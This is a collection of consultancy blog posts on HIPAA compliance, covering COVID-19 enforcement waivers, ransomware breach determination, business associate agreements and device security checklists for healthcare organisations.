Chris Apgar, CISSP, CCISO
On April 2, 2020, the Office for Civil Rights (OCR) at the U.S Department of Health and Human Services (HHS) announced that effective immediately, it will exercise its enforcement discretion and will not impose penalties for violations of certain provisions of the HIPAA Privacy Rule against health care providers or their business associates for the good faith uses and disclosures of protected health information (PHI) by business associates for public health and health oversight activities during the COVID-19 nationwide public health emergency. The notification can be found here.
Why is this further “enforcement discretion” a new thing? Because the HIPAA Privacy Rule already permits covered entities to disclose PHI for public health and as it relates to communicable diseases. It doesn’t permit business associates to do the same, though. However, during the COVID-19 pandemic now BAs may disclose PHI to public health officials or health oversight agencies without fear of being penalized.
What types of Business Associates can disclose PHI?
AKA, Does the OCR “enforcement discretion” apply to you?
Business partner Julia Huddleston and I had to think a bit about what types of business associates would be in a position to disclose PHI under this new relaxing of the rules. We identified several who may be able to make these disclosures:
- Telehealth vendors
- Population health vendors
- Group health plan third party administrators (among others)
That said, business associates will still need to pay attention to disclosures! Enforcement relaxation is not intended to give BAs broad permission to disclose PHI. This disclosure is only to be associated with treating those impacted by COVID-19, reporting where cases are appearing and so forth. Even then, if it is possible, the PHI should be de-identified. At the very least such disclosures need to be kept to the minimum necessary.
During the pandemic, covered entities and business associates have more latitude when it comes to the use and disclosure of PHI. Keep in mind that this is a temporary situation. After the national emergency is lifted, enforcement will resume. This means that business associates will no longer have the latitude to disclose PHI to public health officials and health oversight agencies. The current action is similar to the relaxing of enforcement related to the use of platforms like FaceTime for telehealth. For more information about OCR’s COVID 19 resources click here.
Are your policies & procedures up to the risks of a suddenly extended remote workforce? Now is a great time to double-check how relevant yours are for security standards, device use and more. Please call or email if you need help – and stay safe!
Novel Coronavirus, aka COVID-19, is on track to stretch our healthcare system to the breaking point, and our healthcare providers along with it. In effect as of March 15, 2020, the OCR’s published a Limited Waiver of HIPAA Sanctions and Penalties that during this National Emergency could give care providers one less source of anxiety as they work to save lives.
What the Limited Waiver means to hospitals, emergency rooms & you
Although HIPAA remains in force, the very nature of responding to care demands places a huge strain on healthcare providers. Extraordinary circumstances call for extraordinary measures.
To help reduce the concern of potential financial penalties, the HHS Secretary has (as per the issued publication) “exercised the authority to waive sanctions and penalties against a covered hospital that does not comply with the following provisions of the HIPAA Privacy Rule”:
- the requirements to obtain a patient’s agreement to speak with family members or friends involved in the patient’s care
See 45 CFR 164.510(b)
- the requirement to honor a request to opt-out of the facility directory
See 45 CFR 164.510(a)
- the requirement to distribute a notice of privacy practices
See 45 CFR 164.520
- the patient’s right to request privacy restrictions
See 45 CFR 164.522(a)
- the patient’s right to request confidential communications
See 45 CFR 164.522(b)
Don’t forget the defining word is “limited.” The limited waiver only applies until the President of the United States or the HHS Secretary terminates the national emergency status. From that point on, the HIPAA Privacy Rule and associated potential penalties are reinstated. Also remember that national emergency or no, disclosures of personal information are allowed to disaster relief organizations, like the American Red Cross. That leniency lets them notify loved ones of your location. Also keep in mind that the waiver applies only to hospitals, including their emergency rooms. Other covered entities – like doctors and health plans, still must comply with all Privacy Rule requirements.
- On COVID-19, please visit: https://www.coronavirus.gov or https://www.cdc.gov/coronavirus/2019-ncov/index.html
- Regarding HIPAA and COVID-19, view the HHS Office for Civil Rights’ (OCR) March 16, 2020, Bulletin on the HIPAA Waiver here: https://www.hhs.gov/sites/default/files/hipaa-and-covid-19-limited-hipaa-waiver-bulletin-508.pdf
- View the Waiver or Modification of Requirements under Section 1135 of the Social Security Act as the result of the consequences of the 2019 Novel Coronavirus at: https://www.phe.gov/emergency/news/healthactions/section1135/Pages/covid19-13March20.aspx
- How the HIPAA Privacy Rule applies in an emergency, visit the OCR’S HIPAA Emergency Preparedness, Planning, and Response page or you may use the HIPAA Disclosures for Emergency Preparedness Decision Tool.
Contact Apgar & Associates for consulting expertise in privacy, information security, HIPAA, HITECH and regulatory compliance. We also guide you through the what and the how of preparation for HITRUST, SOC2 and ISO certifications.
As we cope with the COVID-19 pandemic, it’s important to take a few extra measures to protect your organization, your patients and clients, and your data. Teleworking, where more and more individuals are working remotely, is widely accepted to prevent further spread of the virus. Now is a good time to address the risks that come with working remotely, especially if workstations are not owned by your organization.
Minimum Employee Needs for Secure Remote Work
As you prepare yourself and your teams for expanded teleworking here’s a checklist of what you need to do to reduce the risks associated with mobile device use that may be outside of what you would normally permit. If employees will be using their own devices and working remotely, at a minimum they need the following:
- Secure wireless router that’s cabled or wireless secured with WPA 2
- A strong home router password
- A strong device password
- Up to date antimalware and firewall
- Up to date patching on the device used
- If connecting to your network, a secure connection to the network (e.g., VPN, TLS, HTTPS)
If employees are using a company laptop, you need to require the use of a secure connection with a strong password. It would also be a good idea to make sure if company workstations will be used that all of the above are addressed. Patching is important to prevent vulnerabilities from being exploited by cybercriminals.
One last caution: Phishing. Now more than ever employees need to be reminded to beware of phishing activity. There are a number of known phishing attacks associated with COVID-19. Social engineering can result in a breach, ransomware attacks and other damage to your infrastructure and data. It’s a good idea to point employees to the CDC and other reputable sources so they know what sites are safe to visit. That way they can remain up to speed on what’s happening with the pandemic, with less risk.
As was said every episode of Hill Street Blues, stay safe out there!
When you’re making on-the-fly revisions and updates to your policies and procedures during this critical time, you want to help them stick. A tip: make sure they state what you will do, not just what you can do. “If you say it, do it. If you do it, write it down.” Call on Apgar & Associates at 503-384-2538 for help with privacy and information security fundamentals as well as strategic planning.
It’s one of those questions that never goes away. The answer is, “Maybe” and very definitely, “Not always.” Contrary to popular belief, even after ransomware attacks, the safe harbor still applies when it comes to breaches. If your PHI data was encrypted prior to the ransomware attack that encrypted (aka “held for ransom”) it, you may very well not have suffered a breach. Which means that there may be no need to conduct a four-factor risk assessment.
If only it could be so simple. However, per OCR’s weigh-in, you do need to ascertain that the data attacked was encrypted at the time. If it was encrypted, it’s a security incident, but not a data breach. I’ll dig into that shortly. Far too often I see posts and blogs that adamantly declare, “If a ransomware attack occurs, it must be a breach.” Not so fast. It’s not so black and white.
OCR has stated that it’s a fact-based determination as to whether or not a breach occurred. If a breach, then you do need to notify OCR, individuals and potentially, the media. If you run into a consultant (and sometimes counsel) who states that all ransomware attacks absolutely equal a breach, get a second opinion.
Data Encryption & the Burden of Proof
Here’s the flip side – when encrypted PHI may become unsecure, representing a breach due to a ransomware attack. Keep in mind that when you’ve powered up and logged in to your laptop or other mobile device, data may be unencrypted at the time because you’re accessing the data. When ransomware hits and those files are unencrypted at the time of the attack, you may have a breach of unsecured PHI on your hands.
But – if you do use full disk encryption and your laptop was not turned on (which means your laptop wasn’t unencrypted), or if no files were unencrypted at the time of the attack, the PHI was not compromised. No breach occurred.
Also, if the ransomware attack hits your backup media, encrypted at the time of the attack, there is a high likelihood that no PHI breach occurred. Triple-check to be sure and be able to prove it if OCR comes to call. The burden of proof lies with you.
The burden of proof is greater under other circumstances, like when a ransomware attack occurs and PHI is not encrypted. At that point, you absolutely need to conduct a four-factor risk assessment. It bears mentioning, though, that if you have top talent forensic analysts who can prove that no PHI was siphoned off, you still may not be required to notify OCR or individuals because the PHI was not compromised.
Clearly, it’s not a simple black and white, yes or no answer to the breach question. Be careful. Preserve all evidence. Look closely at the circumstances to make sure no breach occurred that requires notification. But if a consultant or counsel, going on the basis of a blog post, says that you absolutely must notify because ransomware attacks always equal a breach, don’t take my word for it. Just ask OCR.
Compliance Planning includes the “what to do” in the case of a security incident and data breach. Chris Apgar, CISSP and Julia Huddleston, CIPP, CIPM, work with clients nationwide on HIPAA privacy and security compliance, and address the need for assistance with expanded use of electronic health information exchange. They also prep clients for the rigorous process of HITRUST, SOC2 and ISO certifications.
Are you sure your medical records aren’t accessible by outsiders? Maybe check your perimeter security. I’m not talking about fancy technical security gadgets, but the simple, obvious things like setting a password on your internet-facing applications.
Here’s why I ask. Did you hear about the 187 medical system servers not protected by passwords or necessary perimeter security measures? Thank the recent Pro Publica investigation for that bombshell. An example: with just a simple data query, a MobilexUSA server exposed the names of more than a million patients! The investigation uncovered the release of names, birthdates, and in some cases, social security numbers.
Get back to the basics. Avoid the obvious errors like
- leaving default passwords on servers (ask the State of Utah about their massive breach),
- not setting passwords at all and other blatant mistakes.
You lose patient trust, and you lose money. There are notification costs, harm to your reputation, not to mention significant OCR fines. Another big expense? The regulators’ imposed corrective action plans (CAPs).
Let’s look at the password issue alone. Basic perimeter security doesn’t stop at the need to change default server passwords, and to set up an original password. Take it up a notch. Make sure the passwords you set aren’t easy to guess. Get complex. For cybercriminals, it doesn’t take a lot of computing power to crack a simple password. Take it for granted that you need to set complex passwords on all of your devices.
Too often, it’s the simple things that get you. If simple mistakes are why your data is exposed to the internet, you’re setting your organization up to an OCR finding of willful neglect. That will definitely lead to civil penalties or monetary settlements. Remember, fancy technology isn’t your biggest risk; it’s people and easy mistakes with significant implications.
No doubt, limited resources are an issue for smaller healthcare organizations like small clinics and health information technology (HIT) startups. On the other hand, the adverse impact of not attending to even simple things can put smaller organizations out of business. If you’re a smaller organization, or just not sure where to start, try the Office of the National Coordinator for Health Information Technology (ONC). There are plenty of no-cost resources available, like the toolkit for providers. Tackling perimeter security can be overwhelming, which is why it’s essential to start small, with the basics.
Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC is a nationally known speaker and author. He most recently authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT. Chris is also a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law, and electronic health information exchange.
Isn’t it rewarding when a fellow security professional posts about an attempted hack of his personal website that he turned into a lesson in website security? And in the end, hacked the hacker? That’s exactly what happened with Larry Cashdollar, a senior security response engineer at Akamai. Cashdollar noticed something peculiar in the logs on his personal website. He dug further and turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.
Before diving into the details, if you’re not sure what an RFI vulnerability is, definitely ask your web development and website management team if they’re aware of this type of vulnerability. And if they don’t know, they need to do some research to prevent hacking attacks on your websites. You can satisfy your curiosity – and share with your web team – this link to more information about it.
On to the Hacking Attempt
Larry Cashdollar told The Register his site’s logs showed that a would-be attacker was probing for RFI holes to trick web applications into running a remote malicious script. The hacker was trying to load a file using a custom tool that Cashdollar had created (!).
The hacker test was a generic test used against websites where they can figure out the input, supply a web address and see if they can execute on the input. Unfortunately for the attacker, Cashdollar used the tool’s logs to trace back to the file that the attacker was trying to load. Then Cashdollar assessed that and other files the hacker had ready to execute to take over vulnerable websites, and was able to extract the criminal’s email address and their preferred language – Portuguese.
What was the purposes of the RFI vulnerability probe? The attacker wanted to install phishing pages that masqueraded as a legitimate bank’s login webpage, and then direct victims to the hacker’s page to collect bank account credentials. This was a way around installing more sophisticated code to capture cryptocurrency. It was just a matter of redirecting someone to a malicious site because the initial fake webpage looked legitimate.
3 Big Takeaways from the RFI Vulnerability Probe
Score one for the good guys! In this case the security professional caught and tracked down the attacker. Now we need to take it as an alert to professionals who’re responsible for monitoring website security. From Cashdollar’s account of the incident, the big takeaways for website administrators are the importance of:
- Diligently monitoring the audit logs
- Following a solid patching program for site management tools
- Writing web code that cannot be exploited for RFI and other known vulnerabilities.
If your website developers and administrators don’t know and don’t watch, you may not be as lucky as Cashdollar.
Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC is a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law and electronic health information exchange. A nationally known speaker and author, Chris authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT.
Ever run into a vendor who claims to be a conduit versus a business associate (BA)? It happens all too often, in my experience. Here’s the problem: the conduit exception is a narrow one. If you’re storing PHI data, even encrypted PHI where you don’t have the encryption key, you’re a BA. Sign the Business Associates Agreement (BAA); it applies to you.
Not convinced? Let’s look at the preamble to the Omnibus Rule of 2013. HHS said, “The conduit exception is a narrow one and is intended to exclude only those entities providing mere courier services, such as the U.S. Postal Service or United Parcel Service and their electronic equivalents, such as internet service providers (ISPs) providing mere data transmission services. As we have stated in prior guidance, a conduit transports does so on a random or infrequent basis. Thus, document storage companies maintaining protected health information on behalf of covered entities are considered business associates, regardless of whether they actually view the information they hold.”
With that HHS summary in mind, you can see it’s pretty difficult to market services and storage to the healthcare industry without a BAA and think you won’t run afoul of HIPAA. Yet even as recently as a few years ago, our privacy and information security firm would encounter storage vendors and document sharing vendors who would not sign a business associate agreement. Again, just because you can’t access the PHI doesn’t mean you’re not a business associate.
In OCR’s May 2019 guidance, you’ll find a list of BA liabilities. Those remind BAs of their compliance responsibilities in regard to HIPAA regulations. OCR’s reminder list also notes that BAs have a duty to execute a business associate agreement with their BA subcontractors. What isn’t mentioned, but is required, is that covered entities (CE) and BAs must execute a BAA with each other. So if you’re not an internet service provider (ISP), or the US Postal Service (and the like), plus you store PHI, you need to execute a BAA to be in compliance with HIPAA regulatory requirements.
I’ll end with a cautionary note about vendors convinced they aren’t a business associate. Covered Entities, if your vendor is unwilling to sign a BAA, yet they have access to your PHI, it’s probably a good idea to find another vendor. It may be that your vendor who stores paper charts or other PHI doesn’t realize that they’re a business associate. Or it could be that, in the case of a storage unit, the storage facility owners simply don’t know what’s being stored. But if PHI is involved, then you need to execute a business associate agreement.
Whether you’re a physician practice, a medical transcription service, or a TPA providing a health plan with claims processing services, you’re dealing with HIPAA compliance. Give us a call: 503-384-2538 for help to assure you’re on top of it.
By now you’ve likely heard that Amazon is moving into the HIPAA space with Alexa. In conjunction with their partners, they’re launching what Amazon calls “HIPAA compliant” apps. If only it were that easy to create a HIPAA covered app, or as Amazon calls it, skill. As with Amazon Web Services (AWS) it’s ultimately up to the individual developers to honor the law. While Amazon may well be a trusted third party, if developers don’t build apps or “skills” with privacy, security and HIPAA compliance in mind, I wouldn’t trust Alexa with any of my healthcare data.
Having worked with a number of software development companies in the healthcare space, I can tell you that more often than not developers want to create cool and useful things. The problem with that is cool and useful don’t always automatically align with security and privacy needs. In fact, in the development process you won’t often find security and privacy at the top of the priority list.
Time, Trust & Alexa Users
Trust but verify, folks. If I were the covered entity or business associate planning to eventually trust the Amazon platform to adequately secure protected health information, I would want assurances and proof that the developers of any app/skill have privacy and security baked in.
Granted, Amazon has indicated that trust takes time to build. That it will be a while before patients widely trust Alexa with sensitive health information. Ok, let’s say we’re down the road a way. Trust has been earned. Now we face another potential issue that has nothing to do with the platform or any of its available apps/skills. The concern lies with the end users. End users are not always savvy when it comes to protecting sensitive personal information. I think this is where there’s a definite need for some education on the part of partners, Amazon and healthcare providers.
Right now, when Alexa is on, it listens to all voices in the room, all the time. How awful would it be if an end user thought he or she was taking advantage of touted HIPAA compliant solutions but instead was airing sensitive information using another Alexa app? Hopefully Alexa will also be smart enough to not broadcast protected health information like “You need to follow up with your [insert-private-condition-here] specialist” to the whole house.
Alexa (Amazon), are you listening?
Consumers on the warpath to protect personal data privacy are making strides in state houses. For instance, here’s an update on Oregon’s Senate Bill 703 re selling health information. If you use Big Data at all, you’ve probably been following this Bill. It’s basically saying that anyone selling personal health information, although thoroughly de-identified, would need to pay the source for the privilege, i.e., you and me. As you may imagine, research groups and analysts who may touch any Oregonian’s de-identified PHI, not to mention privacy officers at the source of de-identified data, are watching this closely.
You can likely thank Facebook backlash for this Bill. Taking personal data and sharing it without user knowledge has caused huge problems for the social media giant. Now we’re hearing that they’re going to reel it all in, but how do you get the genie back in the bottle? The trust is gone, and SB 703 is just one instance of how outraged consumers are at how data is being used.
From a compliance perspective, the information, aka personal data, is already de-identified PHI, so that’s not the basis for the Bill. It’s a clear call for personal data privacy protection beyond the pale of what we’ve seen up to now. You can also look at the yet-to-go-live California Consumer Privacy Act as another example of privacy protection taken to the Nth degree.
This isn’t to say that personal data privacy isn’t important because it absolutely is, it’s merely to point out that the logistical reality of complying with either SB 703 or CCPA is a nightmare we’ve yet to face. You can hardly blame people for playing ostrich when confronted with such a daunting task. You can also hardly blame people for pushing back on companies being able to use personal information for free.
We’ll be writing more on CCPA and its potential effect on business operations both outside and within the healthcare environment. In the meantime, should Oregon’s SB 703 move further down the path to fruition, we’ll weigh in on that, too.
Need specialized insight on these and other data privacy and information security regulations? Contact Apgar & Associates, LLC at 503-384-2538. Our in-the-trenches knowledge and professional consulting will help you and your workforce with compliance and critical certification preparation.
When your goal is to protect PHI on laptops and mobile devices, keep in mind that information security is only as strong as its weakest link. Lenient information security standards exponentially increases the risk to sensitive healthcare data. It can also place you in non-compliance with the HIPAA Security Rule. On top of that the courts are likely to see it as a security failing in the case of data breaches. Now you’re looking at an expensive law suit!
An abbreviated overview of the HIPAA Security Rule’s general requirements calls for covered entities and business associates to do the following:
- Ensure the confidentiality, integrity, and availability of all electronic protected health information the covered entity or business associate creates, receives, maintains, or transmits.
- Protect against any reasonably anticipated threats or hazards to the security or integrity of such information.
- Protect against any reasonably anticipated uses or disclosures of such information that are not permitted or required under Subpart E of this part.
Can you demonstrate device encryption?
CEs and BAs, keep in mind, too, that you can’t take advantage of the HIPAA Breach Notification Rule safe harbor if you can’t demonstrate that stolen devices were actually encrypted at the time. If the device isn’t locked down, it’s hard to prove that the device was secure and no PHI or PII accessed when the device is lost or stolen. While Apple tablets and smartphones are natively encrypted, either end users or IT staff need to enable or turn on encryption for Android tablets and smart phones, Windows laptops, tablets and smartphones and Macs. Take the below steps to protect laptops, tablets and smartphones – and to protect PHI.
7 Steps to Laptop Data Security & Intrusion Protection
- Remove administrator privileges for all company-owned laptops and lock down devices
- Install and maintain mobile device management tools that support:
- Remote wipe of hard and flash drives
- Device tracking in the event a device is lost or stolen
- Enforce encryption of hard drives and flash drives
- Install and periodically update anti-malware applications
- Install and periodically update firewall applications
- Enforce strong passcodes or passwords and require periodic password changes
- Enable biometric authentication if available
- If using Windows, properly set share and Microsoft New Technology File System (NTFS) permissions to keep network snooping to a minimum and unauthorized users out of sensitive files stored locally
6 Ways to Protect Tablet & Smart Phone Security & Prevent Intrusion
- Remove administrator privileges for all company owned tablets and smartphones and lock down devices
- Install and maintain mobile device management tools (company owned and personally owned; BYOD) that support:
- Remote wipe of flash drives
- Device tracking in the event a device is lost or stolen
- Enforce encryption of flash drives
- Preferably – segregate company data from personal data on BYOD devices
- Install and periodically update anti-malware applications (Exception: iPhones and iPads)
- Install and periodically update firewall applications (Exception: iPhones and iPads)
- Require strong passcodes or passwords and regular password changes
- Enable biometric authentication if available
Device hardening is considered a reasonable security safeguard which means it’s a “must do” when it comes to HIPAA compliance and state law compliance in some states. Take the necessary steps to protect PHI and avoid the bad headlines, regulatory penalties, law suits and lost business. If you need to beef up compliance planning, conduct your security risk analysis, or just aren’t sure where to start with any of it, give us a call: 503-384-2538.